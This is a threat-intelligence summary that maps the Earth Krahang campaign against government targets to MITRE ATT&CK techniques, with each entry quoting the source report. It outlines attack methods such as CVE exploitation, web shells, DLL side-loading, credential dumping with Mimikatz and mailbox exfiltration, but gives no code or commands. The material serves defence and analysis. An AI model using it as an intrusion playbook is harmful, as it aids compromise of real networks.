Earth Krahang Exploits Intergovernmental Trust to Launch Cross-Government Attacks

MITRE Techniques

• [T1595.001] Active Scanning: Scanning IP Blocks – used to discover public-facing servers and scan targets (“scanning of public-facing servers”).
• [T1595.002] Active Scanning: Vulnerability Scanning – used with tools like sqlmap, nuclei, xray to find exploitable web server vulnerabilities (“vulnerability scanning with tools like sqlmap, nuclei, xray…”).
• [T1595.003] Active Scanning: Wordlist Scanning – used for recursive searches and wordlist/directory bruteforce to find sensitive files (“recursive searches of folders such as .git or .idea” and “brute-forcing directories”).
• [T1592] Gather Victim Host Information – enumerating host files and paths to find credentials or config details (“identify files that may contain sensitive information such as file paths or passwords”).
• [T1590] Gather Victim Network Information – examining subdomains and network exposure to locate unmaintained servers (“tend to examine the subdomains of their targets”).
• [T1583.001] Acquire Infrastructure: Domains – acquiring/using domains to stage payloads and host C2 or download links (abuse of compromised government domains to host backdoors).
• [T1583.003] Acquire Infrastructure: Virtual Private Server – using VPS or compromised servers to host tooling and VPNs (SoftEther installed on compromised public-facing servers).
• [T1586.002] Compromise Accounts: Email Account – brute-forcing and hijacking government email accounts to send spear-phishing (“used a compromised mailbox from a government entity to send a malicious attachment”).
• [T1584.004] Compromise Infrastructure: Server – exploiting public-facing servers and installing web shells/backdoors (“drop web shells, and install backdoors”).
• [T1588.001] Obtain Capabilities: Malware – obtaining or developing custom backdoors like RESHELL and XDealer (“identified two unique malware families … RESHELL and XDealer”).
• [T1588.003] Obtain Capabilities: Code Signing Certificates – abusing stolen code-signing certs to sign XDealer loaders (“signed with valid code signing certificates issued by GlobalSign”).
• [T1608.001] Stage Capabilities: Upload Malware – hosting and uploading malware to compromised servers to serve targets (“compromised government webservers to host their backdoors”).
• [T1608.002] Stage Capabilities: Upload Tool – uploading tools like SoftEther, Cobalt Strike components, and loaders to victim servers (“dropped PlugX and ShadowPad samples in victim environments”).
• [T1608.005] Stage Capabilities: Link Target – crafting download links on legitimate government domains sent via spear-phishing (“send download links to other government entities via spear phishing emails”).
• [T1190] Exploit Public-Facing Application – exploiting CVEs such as CVE-2023-32315 and CVE-2022-21587 to gain access to servers (“abused the following vulnerabilities multiple times”).
• [T1566.001] Phishing: Spearphishing Attachment – sending RAR/LNK/EXE attachments that deploy backdoors (LNK deploying XDealer installer and opening a decoy document).
• [T1566.002] Phishing: Spearphishing Link – sending links hosted on compromised government domains to download payloads (“malicious link uses a legitimate government domain”).
• [T1199] Trusted Relationship – abusing trust between government entities by using their infrastructure and accounts to target peers (“abuses the trust between governments to conduct their attacks”).
• [T1078] Valid Accounts – use of discovered or brute-forced credentials to log in and exfiltrate emails or send phishing (“likely discovered the weak credentials … using brute-forcing tools”).
• [T1059.001] Command and Scripting Interpreter: PowerShell – using certutil and scripting to download/install SoftEther and other tooling (use of certutil commands cited).
• [T1059.003] Command and Scripting Interpreter: Windows Command Shell – running system commands and installers as part of deployment and persistence activities.
• [T1059.006] Command and Scripting Interpreter: Python – custom Python scripts used to send spear-phishing and to exfiltrate mailboxes (“The Python script used by Earth Krahang to send spear-phishing emails” and mailbox exfiltration scripts).
• [T1203] Exploitation for Client Execution – LNKs and malicious documents used to trick users into executing backdoors (“RAR archive containing an LNK file that deployed the Xdealer malware”).
• [T1569.002] System Services: Service Execution – installing services or running server components such as SoftEther renamed to tasklist.exe to appear legitimate (“SoftEther server executable is renamed to either taskllst.exe, tasklist.exe…”).
• [T1204.002] User Execution: Malicious File – social engineering lures (geopolitical document names) to induce user execution (“backdoor filenames are usually related to geopolitical topics”).
• [T1047] Windows Management Instrumentation – use of WMIC for lateral code execution (“Lateral code execution via WMIC”).
• [T1543.003] Create or Modify System Process: Windows Service – persistence via services and task scheduling to maintain backdoors and VPN components (“Maintaining backdoor persistence with task scheduling” and service execution behaviors).
• [T1133] External Remote Services – deploying SoftEther VPN and using external services to access internal networks (“build VPN servers on compromised public-facing servers to establish access into the private network”).
• [T1053.005] Scheduled Task/Job: Scheduled Task – persistence via scheduled tasks to maintain active backdoors (“Maintaining backdoor persistence with task scheduling”).
• [T1505.003] Server Software Component: Web Shell – deploying web shells on compromised servers to drop tools and backdoors (“deployed via web shell on compromised servers”).
• [T1068] Exploitation for Privilege Escalation – exploiting local/Linux CVEs for privilege escalation (CVE-2021-4034, CVE-2021-22555, CVE-2016-5195 cited).
• [T1078.003] Valid Accounts: Local Accounts – using local account credentials for privilege escalation and persistence (“Valid Accounts: Local Accounts”).
• [T1140] Deobfuscate/Decode Files or Information – loaders and DLLs decode encrypted shellcode/C2 payloads (faultrep.dll decodes encoded shellcode stored in faultrep.dat).
• [T1574.002] Hijack Execution Flow: DLL Side-Loading – side-loading DLLs (fontsets.exe + faultrep.dll) to load Cobalt Strike shellcode (“DLL side-loading vulnerability … fontsets.exe … side-load the DLL file faultrep.dll”).
• [T1656] Impersonation – using legitimate-sounding filenames, email subjects, and government domains to impersonate trusted entities (geopolitical lure filenames and trusted government domains used in emails).
• [T1036.005] Masquerading: Match Legitimate Name or Location – renaming executables (tasklist.exe, curl) to appear legitimate (“renamed to either taskllst.exe, tasklist.exe … or curl”).
• [T1036.007] Masquerading: Double File Extension – using names like .doc.exe to trick users (“…Draft Cabinet status … .doc.exe” examples).
• [T1112] Modify Registry – enabling RDP by modifying fDenyTSConnections in the registry (“Enabling Remote Desktop connections by modifying the Windows Registry “fDenyTSConnections””).
• [T1110.003] Brute Force: Password Spraying – brute-force attacks against OWA/ActiveSync using common passwords and ruler/custom scripts (“brute force attacks on Exchange servers via their Outlook on the web portals”).
• [T1003.001] OS Credential Dumping: LSASS Memory – dumping LSASS with Mimikatz or ProcDump to retrieve credentials (“Accessing credentials by dumping Local Security Authority Subsystem Service (LSASS) with Mimikatz or ProcDump”).
• [T1003.002] OS Credential Dumping: Security Account Manager – dumping SAM database (HKLM/sam) to obtain credentials (“Accessing credentials by dumping the SAM database (HKLM/sam)”).
• [T1539] Steal Web Session Cookie – use of authenticated cookies to export Zimbra mailboxes (“package the victim’s mailbox via the mail server API using an authenticated cookie stolen by the threat actor”).
• [T1087.001] Account Discovery: Local Account – discovery of local accounts during reconnaissance and lateral exploration (“Account Discovery: Local Account”).
• [T1087.002] Account Discovery: Domain Account – enumerating domain accounts to plan lateral movement (“Account Discovery: Domain Account”).
• [T1069.002] Permission Groups Discovery: Domain Groups – discovery of domain groups to map permissions (“Permission Groups Discovery: Domain Groups”).
• [T1057] Process Discovery – enumerating running processes during post-exploitation (“Process Discovery”).
• [T1033] System Owner/User Discovery – identifying system owner/user context during discovery (“System Owner/User Discovery”).
• [T1007] System Service Discovery – enumerating services to identify persistence opportunities (“System Service Discovery”).
• [T1210] Exploitation of Remote Services – exploitation of remote services to move laterally (“Exploitation of Remote Services”).
• [T1534] Internal Spearphishing – sending spear-phishing internally using compromised government accounts (“send spear-phishing emails to government-related targets using compromised government email accounts”).
• [T1021.006] Remote Services: Windows Remote Management – use of remote management for lateral movement (“Remote Services: Windows Remote Management”).
• [T1119] Automated Collection – automated harvesting and packaging of emails for exfiltration (“Automated Collection”).
• [T1114] Email Collection – targeted email collection and mailbox export from Zimbra and Exchange (“Email Collection” and mailbox export scripts shown).
• [T1071.001] Application Layer Protocol: Web Protocols – C2 over web protocols for backdoors and Cobalt Strike (“Application Layer Protocol: Web Protocols”).
• [T1573] Encrypted Channel: Symmetric Cryptography – C2 communications encrypted with AES for RESHELL and others (“C&C communication is encrypted with the AES algorithm”).
• [T1105] Ingress Tool Transfer – transferring tools and payloads into victim environments (“dropped PlugX and ShadowPad samples in victim environments”).
• [T1572] Protocol Tunneling – installing SoftEther VPN to tunnel/proxy access into private networks (“build VPN servers on compromised public-facing servers”).
• [T1020] Automated Exfiltration – automated exfiltration of mailboxes and data using scripts and tools (“The Python script used by Earth Krahang to exfiltrate the victim’s mailbox”).